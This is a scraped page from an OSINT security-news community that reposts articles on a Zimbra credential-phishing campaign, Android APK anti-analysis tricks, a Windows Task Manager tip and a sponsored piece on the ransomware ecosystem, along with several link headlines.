176
The War Room
1 readers
1 users here now
Community for various OSINT news and subject matter for open discussion or dissemination elsewhere
founded 1 year ago
MODERATORS
177
1
Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode
(securityaffairs.com)
178
Phishing campaign steals accounts for Zimbra email servers worlwide
An ongoing phishing campaign has been underway since at least April 2023 that attempts to steal credentials for Zimbra Collaboration email servers worldwide.
According to a report by ESET, phishing emails are sent to organizations worldwide, with no specific focus on certain organizations or sectors. The threat actor behind this operation remains unknown at this time.
Targets heatmap (ESET)
Pretending to be Zimbra admins
According to the ESET researchers, the attacks start with a phishing email pretending to be from an organization's admin informing users of an imminent email server update, which will result in temporary account deactivation.
The recipient is requested to open an attached HTML file to learn more about the server upgrade and review instructions on avoiding the deactivation of accounts.
Phishing email content (ESET)
When opening the HTML attachment, a fake Zimbra login page will be shown that features the targeted company's logo and brand to appear authentic to the targets.
Also, the username field in the login form will be prefilled, further lending legitimacy to the phishing page.
Zimbra phishing page (ESET)
Account passwords entered in the phishing form are sent to the threat actor's server via an HTTPS POST request.
Code that exfiltrates user input (ESET)
ESET reports that in some instances, the attackers use compromised administrator accounts to create new mailboxes that are used for disseminating phishing emails to other members of the organization.
The analysts underline that despite the lack of sophistication for this campaign, its spread and success are impressive, and users of Zimbra Collaboration should be aware of the threat.
Zimbra servers under fire
Hackers commonly target Zimbra Collaboration email servers for cyber espionage to collect internal communications or use them as an initial point of breach to spread to the target organization's network.
Earlier this year, Proofpoint revealed that the Russian 'Winter Vivern' hacking group exploited a Zimbra Collaboration flaw (CVE-2022-27926) to access the webmail portals of NATO-aligned organizations, governments, diplomats, and military personnel.
Last year, Volexity reported that a threat actor named 'TEMP_Heretic' leveraged a then zero-day flaw (CVE-2022-23682) in the Zimbra Collaboration product to access mailboxes and perform lateral phishing attacks.
"The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries," concludes ESET.
179
180
181
182
183
184
Windows Task Manager refresh can be paused using CTRL key
A very useful and previously unknown Windows tip was revealed this week, where you can halt process jumping in Task Manager by holding down the Ctrl key on your keyboard, allowing easier access to a listed process.
The Windows Task Manager is one of the most useful built-in tools for managing your system, allowing you to terminate unresponsive applications and see what processes are using too much CPU, memory, and other resources.
However, when you sort by resources, like CPU utilization, and have many running processes, you will find that the processes jump around in the list due to constantly changing processor utilization.
This process jumping can make it hard to select a process or see a snapshot in time. time.
Task Manager process jumping
Source: BleepingComputer
This week, Microsoft Windows Program Manager Jen Gentleman shared a helpful tip on X (Twitter), saying that you can press and hold the Ctrl key on your keyboard to temporarily freeze the task manager refresh so you can better see what resources a process is using.
To let the process list auto-refresh again, simply release the Ctrl key.
Yesterday, Microsoft developer Dave Plummer shared that he was behind this useful feature, coding it so you can select processes that are jumping around.
"Someone finally noticed that if you hold down CTRL, the process list in Task Manager conveniently freezes so you can select rows without them jumping around," Plummer posted on X.
"I did this so you could sort by CPU and other dynamic columns but then still be able to click stuff..."
While it's possible to control the Task Manager refresh speed in the tool's settings, it is not nearly as helpful as you can only pause the refresh entirely or set the refresh speed (Low, Normal, High).
However, with this new method, you can run the refresh speed on 'High' and then pause it as needed using the Ctrl key method.
BleepingComputer has tested this Task Manager tip and can confirm it works on Windows 7, Windows 10, and Windows 11.
185
1
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons
(thehackernews.com)
186
187
188
Thousands of Android APKs use compression trick to thwart analysis
Threat actors increasingly distribute malicious Android APKs (packaged app installers) that resist decompilation using unsupported, unknown, or heavily tweaked compression algorithms.
The main advantage of this approach is to evade detection by security tools using static analysis and hamper examination by researchers, delaying the development of an in-depth understanding of how an Android malware strain works.
Zimperium, a member of the 'App Defense Alliance' dedicated to identifying and eliminating malware from Google Play, analyzed the decompilation resistance landscape after a Joe Security tweet that showcased an APK that eludes analysis yet runs seamlessly on Android devices.
A zLab report published yesterday claims 3,300 APKs are using these unusual anti-analysis methods, which might cause many of them to crash. However, the researchers found a subset of 71 malicious APKs that work fine on Android OS version 9 (API 28) and later.
Zimperium clarifies that none of these apps are on the Google Play store but lists their hashes at the bottom of the report to help people who source apps from third-party stores find and uninstall them.
Compression tricks
Android APKs use the ZIP format in two modes, one without compression and one using the DEFLATE algorithm.
APKs packed using unsupported or unknown compression methods are not installable on Android 8 and older, but they will work fine on Android versions 9 and later.
Zimperium tested the apps it sampled on decompressor tools like JADX, APKtool, and the macOS Archive Utility, and none of them could unzip the APK for analysis.
In addition to using unsupported compression methods, Zimperium also found that malicious APK authors use filenames that surpass 256 bytes to cause crashes on analysis tools, corrupt the AndroidManifest.xml file for obfuscation, and use malformed String Pools to crash tools that parts Android XML files.
Exceedingly long filename (top), malformed string pool header (bottom) (Zimperium)
These are all anti-analysis techniques, and while Zimperium doesn't delve into what those malicious APKs do exactly, the intent to conceal their functions is unlikely to be benign.
Since APKs downloaded from outside Google Play cannot be vetted, the best way to protect against these threats is to avoid installing Android apps from third-party sites in the first place.
If you must install an app outside of Google Play, scan it with a reputable mobile AV tool before installation.
During app installation, pay attention to the requested permissions and look for any red flags unrelated to the app's core functionality.
Finally, "rooting" your Android device makes the user an administrator, allowing malicious APKs to run at the highest privileges on the OS, so this is generally discouraged.
189
Triple Extortion Ransomware and the Cybercrime Supply Chain
Ransomware attacks continue to grow both in sophistication and quantity. 2023 has already seen more ransomware attacks involving data exfiltration and extortion than all of 2022, an increasing trend we expect to continue.
This article will explore the business model of ransomware groups and the complex cybercrime ecosystem that has sprung up around them.
The Rise of Triple Extortion Ransomware
Ransomware is traditionally associated with threat actors utilizing encryption to lock companies of data, systems, and IT infrastructure. However, in recent years, ransomware groups have evolved their tactics to not only encrypt data but also exfiltrate it, making it a double-edged weapon for extortion.
This new approach allows them to not only hold organizations hostage by denying access to their own data, but also threaten to leak or sell the stolen information if the ransom demands are not met.
This shift in strategy has proven to be highly profitable for ransomware groups, as organizations are often willing to pay large sums to prevent the public exposure of their sensitive data, which allows groups to profit off of victims even if the victim has an effective backup and recovery system.
Ransomware group LockBit’s ransomware blog page
Source: Flare
If a victim doesn't pay, groups will often auction off the data, providing another method to monetize their work.
The rise of data extortion ransomware has coincided with a dramatic increase in both the number of groups active and the number of attacks against organizations. Data extortion was originally added to the arsenal of ransomware groups as a double extortion technique, to be used in addition to encryption.
However, recently many groups have begun resorting to triple extortion , in some cases blackmailing individual employees, harassing third-party organizations of the victim, and even DDoSing websites in addition to data encryption and exfiltration.
Ransomware Groups, Affiliates, and Triple Extortion
Ransomware groups don't operate alone. They often have a network of affiliates who help them carry out attacks and distribute the ransomware. These affiliates may specialize in different aspects of the attack, such as initial access, data exfiltration, or negotiation.
Affiliate programs enable groups to focus on developing new variants, negotiation, or other aspects of the attack, allowing for role specialization and a greater number of attacks over time.
And it's paying off; Flare has already detected more ransomware data disclosures in 2023 than in all of 2022, representing a steep increase in the number of attacks.
Ransomware group LockBit’s Affiliate Rules page
Source: Flare
Additionally, since we are looking at disclosure, we are likely only identifying a small number of the total attacks against organizations.
As the ecosystem has grown, we have seen that ransomware groups are becoming increasingly aggressive. Groups such as Karakurt have been documented as not only exfiltrating data but also harassing individual employees and even third parties within the organization.
Triple Extortion Ransomware in Context: The Broader Cybercrime Ecosystem
The broader cybercrime ecosystem also acts as a crucial enabler for ransomware groups by offering services like bulletproof hosting, money laundering, initial access to environments, and employee credentials via stealer logs.
We'll cover a few of the main ways that the broader cybercrime ecosystem intersects with ransomware groups:
Ransomware Groups and Initial Access Brokers
Initial access brokers (IAB) are commonly active on the dark web forums Exploit and XSS. IABs work to compromise corporate IT infrastructure, which they then auction off on specific dark web forums, often with a start price, step price, and "blitz" or buy it now.
An IAB advertises access to a European company for $250
Source: Flare
In many cases, we have seen access brokers advertise that they have access to a victim's backup and recovery systems or that the victim lacks backup and recovery, providing further evidence that IABs expect their listings to be used for ransomware.
Stealer Logs: A Key Vector for Ransomware
Stealer logs likely represent another critical source of initial access to IT environments for ransomware groups. Stealer logs are the result of an infostealer malware infection.
These logs contain valuable information such as usernames, passwords, and other credentials that can be used to gain unauthorized access to systems.
Ransomware groups may acquire these logs from Telegram channels, dark web forums, or marketplaces, enabling them to bypass traditional methods of gaining access to a victim's network.
In a recent Flare analysis, we found more than 50,000 stealer logs that contained credentials to corporate single sign on applications. Stealer logs also include active session cookies, which can be used to bypass MFA authentication controls.
0-Days and Dark Web Marketplaces
The ransomware group CL0P exploited the 0-day MOVEit for enormous advantage, resulting in hundreds of victims and billions of dollars in damages.
0-days are likely one of the least common forms of access that ransomware groups use, due to the sophistication required to find and leverage them and the fact that there are far easier ways to facilitate an infection.
However, numerous dark web marketplaces, forums, and Telegram channels do facilitate sales of alleged 0-day exploits.
Threat actor advertises python exploit
Source: Flare
More sophisticated ransomware groups will also likely source their own vulnerabilities rather than purchasing existing ones.
Ransomware is on the Rise
Data extortion ransomware schemes continue to explode in popularity, with new groups arising on a monthly basis and dozens of new victim organizations every week.
Building an effective continuous threat exposure management process that enables automated detection of stealer logs, ransom blog mentions, illicit Telegram channels , and monitoring of other cybercrime forums has never been more important than now.
Ransomware Detection & Remediation with Flare
Flare currently monitors more than 50 ransomware groups that are actively engaged in double and triple extortion schemes. Flare’s easy-to-use SaaS platform automates detecting company-specific threats across the clear & dark web and illicit Telegram channels.
Sign up for a free trial to learn more about how Flare can boost your security program’s cybercrime monitoring capabilities in 30 minutes.
Sponsored and written by Flare
190
191
192
1
New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode
(thehackernews.com)
193
1
New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities
(thehackernews.com)
194
195
196
197
198
199
200